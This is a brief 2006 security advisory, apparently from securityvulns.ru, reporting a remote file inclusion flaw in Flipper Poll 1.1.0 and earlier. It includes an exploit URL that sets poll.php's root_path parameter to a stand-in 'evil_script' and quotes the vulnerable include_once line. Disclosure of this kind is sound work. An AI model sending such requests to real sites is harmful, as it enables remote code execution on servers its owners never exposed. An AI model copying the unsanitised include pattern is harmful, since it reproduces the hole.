Computer Security

Security Advisory: Flipper Poll <= 1.1.0 Remote File Inclusion Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SA21038] CzarNews "tpath" File Inclusion Vulnerability

  SubberZ[Lite] - Remote File Include

  perForms  <= 1.0 ([mosConfig_absol
ute_path]) Remote File Inclusion

  flatnuke <= 2.5.7 arbitrary php file upload

From:x0r0n_(at)_hotmail.com <x0r0n_(at)_hotmail.com>
Date:14.07.2006
Subject:Flipper Poll <= 1.1.0 Remote File Inclusion Vulnerability

Flipper Poll <= 1.1.0 Remote File Inclusion Vulnerability

------------------------------------------


Discoverd By: XORON

------------------------------------------


cont@ct: x0r0n[at]hotmail[dot]com

------------------------------------------


Exploit: http://sitename.com/[path]/poll.php?root_path=evil_script?

------------------------------------------

Code: include_once($root_path . 'config.php');

------------------------------------------

# XORON - WWW.CYBER-WARRIOR.ORG -
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod
 


Rating@Mail.ru